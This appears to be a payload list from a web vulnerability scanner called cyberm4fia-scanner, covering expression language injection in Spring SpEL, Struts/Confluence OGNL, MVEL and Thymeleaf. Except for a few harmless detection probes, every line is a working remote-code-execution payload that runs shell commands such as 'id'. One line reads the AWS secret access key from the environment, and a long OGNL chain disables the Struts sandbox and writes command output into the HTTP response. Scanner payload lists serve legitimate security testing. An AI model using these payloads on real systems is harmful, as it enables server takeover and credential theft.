# Expression Language Injection Payloads — cyberm4fia-scanner
# Categories: SpEL, OGNL, MVEL, Thymeleaf

# ─── SpEL (Spring) Detection ───
${7*7}
#{7*7}

# ─── SpEL RCE ───
${T(java.lang.Runtime).getRuntime().exec('id')}
${T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','id'})}
${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('id').getInputStream()).next()}
${T(java.lang.System).getenv('AWS_SECRET_ACCESS_KEY')}

# ─── OGNL (Struts / Confluence) ───
%{7*7}
%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

# ─── MVEL ───
Runtime.getRuntime().exec("id")
${Runtime.getRuntime().exec("id")}

# ─── Thymeleaf ───
__${T(java.lang.Runtime).getRuntime().exec("id")}__::.x
